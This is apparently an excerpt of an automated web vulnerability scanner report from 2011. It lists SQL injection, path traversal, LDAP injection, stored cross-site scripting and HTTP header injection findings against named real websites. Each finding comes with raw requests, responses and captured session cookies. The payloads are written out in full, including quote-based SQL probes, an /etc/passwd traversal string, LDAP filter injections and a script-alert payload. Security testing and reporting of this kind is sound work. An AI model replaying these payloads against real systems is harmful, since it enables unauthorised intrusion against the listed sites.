Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Mon, 25 Apr 2011 14:38:54 GMT
Content-Length: 4387

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
   <title>TRUCKLIST.RU - ............ 404</title>
   <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
   <lin
...[SNIP]...

1.29. http://www.trucklist.ru/webroot/delivery/js/jquery.json.js [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.trucklist.ru
Path:	/webroot/delivery/js/jquery.json.js

Issue detail

Request 1

GET /webroot/delivery/js/jquery.json.js'?v= HTTP/1.1
Host: www.trucklist.ru
Proxy-Connection: keep-alive
Referer: http://www.trucklist.ru/cars/trucks?utm_source=y_direct&utm_medium=cpc&utm_campaign=truck&_openstat=ZGlyZWN0LnlhbmRleC5ydTsxNzg5NDA3OzUzNzQ4MDA7eWFuZGV4LnJ1Omd1YXJhbnRlZQ
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=94671815d78a1c937988b0a45101e82d; records_per_page=30

Response 1

HTTP/1.1 404 Not Found
Server: nginx/0.7.64
Date: Mon, 25 Apr 2011 14:46:36 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.2.11
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Mon, 25 Apr 2011 14:46:36 GMT
Content-Length: 6640

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
   <title>TRUCKLIST.RU - ............ 404</title>
   <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
   <lin
...[SNIP]...
</b> You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '100') ORDER BY struct.sort_id LIMIT 0,1' at line 1 in <b>
...[SNIP]...

Request 2

GET /webroot/delivery/js/jquery.json.js''?v= HTTP/1.1
Host: www.trucklist.ru
Proxy-Connection: keep-alive
Referer: http://www.trucklist.ru/cars/trucks?utm_source=y_direct&utm_medium=cpc&utm_campaign=truck&_openstat=ZGlyZWN0LnlhbmRleC5ydTsxNzg5NDA3OzUzNzQ4MDA7eWFuZGV4LnJ1Omd1YXJhbnRlZQ
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=94671815d78a1c937988b0a45101e82d; records_per_page=30

Response 2

HTTP/1.1 404 Not Found
Server: nginx/0.7.64
Date: Mon, 25 Apr 2011 14:46:38 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.2.6
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Mon, 25 Apr 2011 14:32:02 GMT
Content-Length: 4387

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
   <title>TRUCKLIST.RU - ............ 404</title>
   <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
   <lin
...[SNIP]...

1.30. http://www.trucklist.ru/webroot/delivery/js/prototype.js [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.trucklist.ru
Path:	/webroot/delivery/js/prototype.js

Issue detail

Request 1

GET /webroot/delivery/js/prototype.js'?v= HTTP/1.1
Host: www.trucklist.ru
Proxy-Connection: keep-alive
Referer: http://www.trucklist.ru/cars/trucks?utm_source=y_direct&utm_medium=cpc&utm_campaign=truck&_openstat=ZGlyZWN0LnlhbmRleC5ydTsxNzg5NDA3OzUzNzQ4MDA7eWFuZGV4LnJ1Omd1YXJhbnRlZQ
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=94671815d78a1c937988b0a45101e82d; records_per_page=30

Response 1

HTTP/1.1 404 Not Found
Server: nginx/0.7.64
Date: Mon, 25 Apr 2011 14:54:16 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.2.11
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Mon, 25 Apr 2011 14:54:16 GMT
Content-Length: 6636

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
   <title>TRUCKLIST.RU - ............ 404</title>
   <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
   <lin
...[SNIP]...
</b> You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '100') ORDER BY struct.sort_id LIMIT 0,1' at line 1 in <b>
...[SNIP]...

Request 2

GET /webroot/delivery/js/prototype.js''?v= HTTP/1.1
Host: www.trucklist.ru
Proxy-Connection: keep-alive
Referer: http://www.trucklist.ru/cars/trucks?utm_source=y_direct&utm_medium=cpc&utm_campaign=truck&_openstat=ZGlyZWN0LnlhbmRleC5ydTsxNzg5NDA3OzUzNzQ4MDA7eWFuZGV4LnJ1Omd1YXJhbnRlZQ
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=94671815d78a1c937988b0a45101e82d; records_per_page=30

Response 2

HTTP/1.1 404 Not Found
Server: nginx/0.7.64
Date: Mon, 25 Apr 2011 14:54:25 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.2.6
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Mon, 25 Apr 2011 14:39:49 GMT
Content-Length: 4387

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
   <title>TRUCKLIST.RU - ............ 404</title>
   <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
   <lin
...[SNIP]...

1.31. http://www.trucklist.ru/webroot/delivery/js/scripts.js [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.trucklist.ru
Path:	/webroot/delivery/js/scripts.js

Issue detail

Request 1

GET /webroot/delivery/js/scripts.js'?v= HTTP/1.1
Host: www.trucklist.ru
Proxy-Connection: keep-alive
Referer: http://www.trucklist.ru/cars/trucks?utm_source=y_direct&utm_medium=cpc&utm_campaign=truck&_openstat=ZGlyZWN0LnlhbmRleC5ydTsxNzg5NDA3OzUzNzQ4MDA7eWFuZGV4LnJ1Omd1YXJhbnRlZQ
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=94671815d78a1c937988b0a45101e82d; records_per_page=30

Response 1

HTTP/1.1 404 Not Found
Server: nginx/0.7.64
Date: Mon, 25 Apr 2011 14:51:11 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.2.6
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Mon, 25 Apr 2011 14:36:34 GMT
Content-Length: 6632

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
   <title>TRUCKLIST.RU - ............ 404</title>
   <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
   <lin
...[SNIP]...
</b> You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '100') ORDER BY struct.sort_id LIMIT 0,1' at line 1 in <b>
...[SNIP]...

Request 2

GET /webroot/delivery/js/scripts.js''?v= HTTP/1.1
Host: www.trucklist.ru
Proxy-Connection: keep-alive
Referer: http://www.trucklist.ru/cars/trucks?utm_source=y_direct&utm_medium=cpc&utm_campaign=truck&_openstat=ZGlyZWN0LnlhbmRleC5ydTsxNzg5NDA3OzUzNzQ4MDA7eWFuZGV4LnJ1Omd1YXJhbnRlZQ
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=94671815d78a1c937988b0a45101e82d; records_per_page=30

Response 2

HTTP/1.1 404 Not Found
Server: nginx/0.7.64
Date: Mon, 25 Apr 2011 14:51:13 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.2.6
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Mon, 25 Apr 2011 14:36:36 GMT
Content-Length: 4387

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
   <title>TRUCKLIST.RU - ............ 404</title>
   <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
   <lin
...[SNIP]...

1.32. http://www.trucklist.ru/webroot/delivery/js/windows/javascripts/window.js [REST URL parameter 6] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.trucklist.ru
Path:	/webroot/delivery/js/windows/javascripts/window.js

Issue detail

The REST URL parameter 6 appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the REST URL parameter 6, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Request

GET /webroot/delivery/js/windows/javascripts/window.js'?v= HTTP/1.1
Host: www.trucklist.ru
Proxy-Connection: keep-alive
Referer: http://www.trucklist.ru/cars/trucks?utm_source=y_direct&utm_medium=cpc&utm_campaign=truck&_openstat=ZGlyZWN0LnlhbmRleC5ydTsxNzg5NDA3OzUzNzQ4MDA7eWFuZGV4LnJ1Omd1YXJhbnRlZQ
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=94671815d78a1c937988b0a45101e82d; records_per_page=30

Response

HTTP/1.1 404 Not Found
Server: nginx/0.7.64
Date: Mon, 25 Apr 2011 14:51:14 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.2.11
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Mon, 25 Apr 2011 14:51:14 GMT
Content-Length: 6670

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
   <title>TRUCKLIST.RU - ............ 404</title>
   <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
   <lin
...[SNIP]...
</b> You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '100') ORDER BY struct.sort_id LIMIT 0,1' at line 1 in <b>
...[SNIP]...

1.33. http://www.trucklist.ru/webroot/delivery/js/windows/themes/alert.css [REST URL parameter 6] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.trucklist.ru
Path:	/webroot/delivery/js/windows/themes/alert.css

Issue detail

Request

GET /webroot/delivery/js/windows/themes/alert.css'?v= HTTP/1.1
Host: www.trucklist.ru
Proxy-Connection: keep-alive
Referer: http://www.trucklist.ru/cars/trucks?utm_source=y_direct&utm_medium=cpc&utm_campaign=truck&_openstat=ZGlyZWN0LnlhbmRleC5ydTsxNzg5NDA3OzUzNzQ4MDA7eWFuZGV4LnJ1Omd1YXJhbnRlZQ
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=94671815d78a1c937988b0a45101e82d; records_per_page=30

Response

HTTP/1.1 404 Not Found
Server: nginx/0.7.64
Date: Mon, 25 Apr 2011 14:46:15 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.2.6
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Mon, 25 Apr 2011 14:31:38 GMT
Content-Length: 6660

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
   <title>TRUCKLIST.RU - ............ 404</title>
   <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
   <lin
...[SNIP]...
</b> You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '100') ORDER BY struct.sort_id LIMIT 0,1' at line 1 in <b>
...[SNIP]...

1.34. http://www.trucklist.ru/webroot/delivery/js/windows/themes/alphacube.css [REST URL parameter 6] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.trucklist.ru
Path:	/webroot/delivery/js/windows/themes/alphacube.css

Issue detail

Request

GET /webroot/delivery/js/windows/themes/alphacube.css'?v= HTTP/1.1
Host: www.trucklist.ru
Proxy-Connection: keep-alive
Referer: http://www.trucklist.ru/cars/trucks?utm_source=y_direct&utm_medium=cpc&utm_campaign=truck&_openstat=ZGlyZWN0LnlhbmRleC5ydTsxNzg5NDA3OzUzNzQ4MDA7eWFuZGV4LnJ1Omd1YXJhbnRlZQ
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=94671815d78a1c937988b0a45101e82d; records_per_page=30

Response

HTTP/1.1 404 Not Found
Server: nginx/0.7.64
Date: Mon, 25 Apr 2011 14:46:21 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.2.6
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Mon, 25 Apr 2011 14:31:44 GMT
Content-Length: 6668

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
   <title>TRUCKLIST.RU - ............ 404</title>
   <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
   <lin
...[SNIP]...
</b> You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '100') ORDER BY struct.sort_id LIMIT 0,1' at line 1 in <b>
...[SNIP]...

1.35. http://www.trucklist.ru/webroot/delivery/js/windows/themes/default.css [REST URL parameter 6] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.trucklist.ru
Path:	/webroot/delivery/js/windows/themes/default.css

Issue detail

Request

GET /webroot/delivery/js/windows/themes/default.css'?v= HTTP/1.1
Host: www.trucklist.ru
Proxy-Connection: keep-alive
Referer: http://www.trucklist.ru/cars/trucks?utm_source=y_direct&utm_medium=cpc&utm_campaign=truck&_openstat=ZGlyZWN0LnlhbmRleC5ydTsxNzg5NDA3OzUzNzQ4MDA7eWFuZGV4LnJ1Omd1YXJhbnRlZQ
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=94671815d78a1c937988b0a45101e82d; records_per_page=30

Response

HTTP/1.1 404 Not Found
Server: nginx/0.7.64
Date: Mon, 25 Apr 2011 14:46:40 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.2.6
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Mon, 25 Apr 2011 14:32:03 GMT
Content-Length: 6664

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
   <title>TRUCKLIST.RU - ............ 404</title>
   <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
   <lin
...[SNIP]...
</b> You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '100') ORDER BY struct.sort_id LIMIT 0,1' at line 1 in <b>
...[SNIP]...

2. File path traversal previous next

Summary

Severity:	High
Confidence:	Firm
Host:	https://www.salesforce.com
Path:	/servlet/servlet.WebToLead

Issue detail

The REST URL parameter 1 is vulnerable to path traversal attacks, enabling read access to arbitrary files on the server.

The payload servlet../../../../../../../../etc/passwd was submitted in the REST URL parameter 1. The requested file was returned in the application's response.

Request

POST /servlet../../../../../../../../etc/passwd/servlet.WebToLead?encoding=UTF-8 HTTP/1.1
Host: www.salesforce.com
Connection: keep-alive
Referer: http://www.reputationchanger.com/
Cache-Control: max-age=0
Origin: http://www.reputationchanger.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Content-Type: application/x-www-form-urlencoded
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mbox=check#true#1303485951|session#1303485890745-255084#1303487751|PC#1303485890745-255084.17#1304695494; webact=%7B%22l_vdays%22%3A-1%2C%22l_visit%22%3A0%2C%22session%22%3A1303485889743%2C%22l_search%22%3A%22%22%2C%22l_dtype%22%3A%22%22%2C%22l_page%22%3A%22SFDC%3Aus%3Aplatform%22%2C%22counter%22%3A0%2C%22pv%22%3A1%2C%22f_visit%22%3A1303485889743%2C%22version%22%3A%22w170.1%22%2C%22rescoped%22%3Atrue%2C%22db%22%3A%7B%22name%22%3A%22media%20visions%22%2C%22size%22%3A%22vsb%22%2C%22ind%22%3A%22software%20%26%20technology%3Ahigh%20tech%22%7D%2C%22bar-expanded%22%3Atrue%7D; s_pers=%20v44%3DExternal%2520Websites%7C3233921094723%3B%20v30%3DExternal%2520Websites%257Cburp%7C3233921094725%3B; s_vi=[CS]v1|26D8CEE5051D3246-60000107A001D614[CE]
Content-Length: 198

oid=00DC0000000Piy3&retURL=http%3A%2F%2Fwww.reputationchanger.com%2Fscheduled.html&lead_source=Website&first_name=2&last_name=2&email=2&phone=2333333333&description=2&imageField.x=75&imageField.y=45

Response

HTTP/1.1 404 Not Found
Server: SFDC
Cache-Control: max-age=0
Cache-Control: must-revalidate
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Content-Length: 23502
Date: Mon, 25 Apr 2011 16:08:38 GMT

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
<meta http-equiv="Content-Type" co
...[SNIP]...
-sjl.ops.sfdc.net
www.salesforce.com
/cms/system/handler/handle404.html
Server error 404
Not Found
The requested resource "/cms/etc/passwd/servlet.WebToLead" was not found on the server.
siteRoot:/sites/sfdc
-->
...[SNIP]...

3. LDAP injection previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://ar.voicefive.com
Path:	/bmx3/broker.pli

Issue detail

The pid parameter appears to be vulnerable to LDAP injection attacks.

The payloads 2a0e35b7bd3690da)(sn=* and 2a0e35b7bd3690da)!(sn=* were each submitted in the pid parameter. These two requests resulted in different responses, indicating that the input may be being incorporated into a disjunctive LDAP query in an unsafe manner.

Request 1

GET /bmx3/broker.pli?pid=2a0e35b7bd3690da)(sn=*&PRAd=253732017&AR_C=194941023 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p91300630=exp=1&initExp=Thu Apr 21 01:24:06 2011&recExp=Thu Apr 21 01:24:06 2011&prad=1201632&arc=1442826&; ar_p90175839=exp=3&initExp=Sun Apr 24 15:20:22 2011&recExp=Sun Apr 24 15:20:23 2011&prad=3992125865291151&arc=6108747&; ar_p81479006=exp=1&initExp=Sun Apr 24 19:44:30 2011&recExp=Sun Apr 24 19:44:30 2011&prad=58779362&arc=40314462&; ar_s_p81479006=1; ar_p97174789=exp=22&initExp=Sun Apr 24 12:09:48 2011&recExp=Mon Apr 25 14:20:21 2011&prad=253732016&arc=181106347&; BMX_3PC=1; UID=875e3f1e-184.84.247.65-1303349046; BMX_G=method%2D%3E%2D1%2Cts%2D%3E1303741228%2E986%2Cwait%2D%3E10000%2C

Response 1

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 25 Apr 2011 14:36:04 GMT
Content-Type: application/x-javascript
Connection: close
Set-Cookie: ar_2a0e35b7bd3690da)(sn=exp=1&initExp=Mon Apr 25 14:36:04 2011&recExp=Mon Apr 25 14:36:04 2011&prad=253732017&arc=194941023&; expires=Sun 24-Jul-2011 14:36:04 GMT; path=/; domain=.voicefive.com;
Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 9

/*error*/

Request 2

GET /bmx3/broker.pli?pid=2a0e35b7bd3690da)!(sn=*&PRAd=253732017&AR_C=194941023 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p91300630=exp=1&initExp=Thu Apr 21 01:24:06 2011&recExp=Thu Apr 21 01:24:06 2011&prad=1201632&arc=1442826&; ar_p90175839=exp=3&initExp=Sun Apr 24 15:20:22 2011&recExp=Sun Apr 24 15:20:23 2011&prad=3992125865291151&arc=6108747&; ar_p81479006=exp=1&initExp=Sun Apr 24 19:44:30 2011&recExp=Sun Apr 24 19:44:30 2011&prad=58779362&arc=40314462&; ar_s_p81479006=1; ar_p97174789=exp=22&initExp=Sun Apr 24 12:09:48 2011&recExp=Mon Apr 25 14:20:21 2011&prad=253732016&arc=181106347&; BMX_3PC=1; UID=875e3f1e-184.84.247.65-1303349046; BMX_G=method%2D%3E%2D1%2Cts%2D%3E1303741228%2E986%2Cwait%2D%3E10000%2C

Response 2

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 25 Apr 2011 14:36:04 GMT
Content-Type: application/x-javascript
Connection: close
Set-Cookie: ar_2a0e35b7bd3690da)!(sn=exp=1&initExp=Mon Apr 25 14:36:04 2011&recExp=Mon Apr 25 14:36:04 2011&prad=253732017&arc=194941023&; expires=Sun 24-Jul-2011 14:36:04 GMT; path=/; domain=.voicefive.com;
Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 9

/*error*/

4. Cross-site scripting (stored) previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://learn.shavlik.com
Path:	/shavlik/index.cfm

Issue detail

The value of the h request parameter submitted to the URL /shavlik/index.cfm is copied into an HTML comment at the URL /shavlik/index.cfm. The payload 744fd--><script>alert(1)</script>aa703b77027 was submitted in the h parameter. This input was returned unmodified in a subsequent request for the URL /shavlik/index.cfm.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request 1

GET /shavlik/index.cfm?m=521&pg=372&h=0744fd--><script>alert(1)</script>aa703b77027&hp=372 HTTP/1.1
Host: learn.shavlik.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=799534; CFTOKEN=57697702; __utmz=225610631.1303732848.1.1.utmgclid=CPC_jKTPt6gCFUh-5QodsROzEA|utmccn=PatchManagement|utmcmd=(not%20set)|utmctr=vulnerability%20management; __utma=225610631.313706594.1303732848.1303732848.1303732848.1; __utmc=225610631; __utmb=225610631.13.10.1303732848

Request 2

GET /shavlik/index.cfm?m=521&pg=372&h=0&hp=372 HTTP/1.1
Host: learn.shavlik.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=799534; CFTOKEN=57697702; __utmz=225610631.1303732848.1.1.utmgclid=CPC_jKTPt6gCFUh-5QodsROzEA|utmccn=PatchManagement|utmcmd=(not%20set)|utmctr=vulnerability%20management; __utma=225610631.313706594.1303732848.1303732848.1303732848.1; __utmc=225610631; __utmb=225610631.13.10.1303732848

Response 2

HTTP/1.1 200 OK
Connection: close
Date: Mon, 25 Apr 2011 12:47:46 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8

...[SNIP]...
<script>alert(1)</script>aa703b77027|372 -- -->
...[SNIP]...

5. HTTP header injection previous next
There are 9 instances of this issue:

http://ad.doubleclick.net/adj/lj.homepage/loggedout [REST URL parameter 1]
http://ad.doubleclick.net/dot.gif [REST URL parameter 1]
http://bs.yandex.ru/count/108pZT9La4K40X00Zh4NwAO4M7sL0vi1R5aYYAZZY0AIgOvc0ue1aRpGIMG6auKDYm51VmG0,bs.mail.ru [REST URL parameter 2]
http://click-here-to-listen.com/players/iaPlay13.swf [REST URL parameter 1]
http://click-here-to-listen.com/players/iaPlay13.swf [REST URL parameter 2]
http://pretty.ru/favicon.ico [REST URL parameter 1]
http://www.instantengage.com/operator_status.php [on parameter]
https://www.salesforce.com/favicon.ico [REST URL parameter 1]
https://www.salesforce.com/servlet/servlet.WebToLead [REST URL parameter 2]

5.1. http://ad.doubleclick.net/adj/lj.homepage/loggedout [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adj/lj.homepage/loggedout

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 69b58%0d%0afb4aa952766 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /69b58%0d%0afb4aa952766/lj.homepage/loggedout;a=1;r=0;w=0;c=se;pt=se;vert=_code;sz=728x90;pos=t;tile=1;ord=2623414837? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
